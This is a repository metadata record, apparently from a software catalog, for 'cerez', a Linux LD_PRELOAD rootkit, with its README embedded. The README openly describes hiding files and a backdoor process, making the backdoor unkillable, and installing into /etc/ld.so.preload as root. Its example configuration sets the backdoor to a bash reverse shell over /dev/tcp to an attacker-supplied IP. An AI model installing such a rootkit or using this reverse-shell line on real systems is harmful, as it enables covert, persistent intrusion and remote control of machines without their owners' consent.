{"id":21130840,"url":"https://github.com/ngn13/cerez","last_synced_at":"2025-07-09T01:33:35.007Z","repository":{"id":177073075,"uuid":"655931035","full_name":"ngn13/cerez","owner":"ngn13","description":"Cerez 😈 userland LD_PRELOAD rootkit","archived":false,"fork":false,"pushed_at":"2024-10-13T06:27:28.000Z","size":139,"stargazers_count":18,"open_issues_count":0,"forks_count":9,"subscribers_count":2,"default_branch":"main","last_synced_at":"2025-04-04T14:37:42.851Z","etag":null,"topics":["ld-preload","ld-preload-rootkit","linux-rootkit","rootkit","rootkit-development","rootkit-kernel","rootkits"],"latest_commit_sha":null,"homepage":"","language":"C","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"gpl-3.0","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/ngn13.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":"LICENSE.txt","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null}},"created_at":"2023-06-19T23:29:01.000Z","updated_at":"2024-12-31T10:10:20.000Z","dependencies_parsed_at":"2023-11-12T21:27:08.855Z","dependency_job_id":"71a76c4a-84f8-48eb-9b77-292b14062378","html_url":"https://github.com/ngn13/cerez","commit_stats":null,"previous_names":["ngn13/cerez"],"tags_count":0,"template":false,"template_full_name":null,"purl":"pkg:github/ngn13/cerez","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/ngn13%2Fcerez","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/ngn13%2Fcerez/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/ngn13%2Fcerez/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/ngn13%2Fcerez/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/ngn13","download_url":
"https://codeload.github.com/ngn13/cerez/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/ngn13%2Fcerez/sbom","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":264375589,"owners_count":23598410,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["ld-preload","ld-preload-rootkit","linux-rootkit","rootkit","rootkit-development","rootkit-kernel","rootkits"],"created_at":"2024-11-20T05:39:59.369Z","updated_at":"2025-07-09T01:33:34.605Z","avatar_url":"https://github.com/ngn13.png","language":"C","funding_links":[],"categories":[],"sub_categories":[],"readme":"\u003ch1 align=\"center\"\u003e\n  \u003cimg src=\"assets/showcase.png\"/\u003e\n  \u003cbr\u003e\n  Cerez 😈 Simple userland LD_PRELOAD rootkit\n\u003c/h1\u003e\n\nCerez is a configurable userland `LD_PRELOAD` rootkit, by installing it\ninto `/etc/ld.so.preload`, you can preload it before every binary.\nIt can protect/hide your backdoor as well other files you want\nhidden. 
It does so by overriding (g)libc functions such as `open`, `unlinkat` etc.\n\n## Features\n- ✔ Hides files in the file system\n- ✔ Hides your backdoor in the process list\n- ❌ Hides connections in the network list\n- ✔ Makes your backdoor unkillable\n- ✔ Makes files inaccessible\n\n## Install\n\u003e [!Important]\n\u003e Don't forget to edit `cerez.cfg` after the installation\n\n### You will need to install `build-essential` and `libconfig` to compile!\nYou can install them with `apt` on Debian-based systems:\n```bash\napt update \u0026\u0026 apt install build-essential libconfig-dev\n```\nYou also may want to install git in order to obtain the source.\n\nTo compile the rootkit, run the following commands\nas **ROOT**:\n```bash\ngit clone https://github.com/ngn13/cerez.git \u0026\u0026 cd cerez\nmake \u0026\u0026 make install\ncd .. \u0026\u0026 rm -rf cerez\n```\nThese commands will compile and install the rootkit and the configuration\nto the system.\n\n## Config (`/etc/cerez.cfg`)\nConfiguration is (really) simple; there are only 3 options:\n\n- `backdoor`: Your backdoor command. This will be run by the rootkit every time a program starts (if it's not already running). Your\nbackdoor will be hidden in the process list. It will also be unkillable.\n- `shell`: The shell that will be used to run the `backdoor` command.\n- `hidden`: A list of files that you want to hide and protect. 
These files will be hidden in directory listings and any attempt to access\nthem will fail, and a fake file will be accessed instead.\n\nHere is an example configuration:\n```\nbackdoor = \"bash -i \u003e\u0026 /dev/tcp/\u003cip\u003e/1234 0\u003e\u00261\"\nshell = \"/bin/bash\"\nhidden = (\n  { path = \"/etc/cerez.cfg\" },\n  { path = \"/etc/ld.so.preload\" },\n  { path = \"/path/to/your/super/secret/file\" }\n)\n```\nNote that after hiding `/etc/cerez.cfg` **you won't be able to access it unless you are running as the backdoor process**.\n\n## Resources\nTo learn more about `LD_PRELOAD` rootkits, I highly recommend you read [this\narticle](https://compilepeace.medium.com/memory-malware-part-0x2-writing-userland-rootkits-via-ld-preload-30121c8343d5).\nI also left some comments in the [loader.c](rootkit/loader.c) so you can go ahead and read it.\n\nAlso this is free (as in freedom) software! So feel free to fork and improve the project.\nIf you are interested, you can also contribute back to the project by creating an issue or a pull request.\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fngn13%2Fcerez","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fngn13%2Fcerez","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fngn13%2Fcerez/lists"}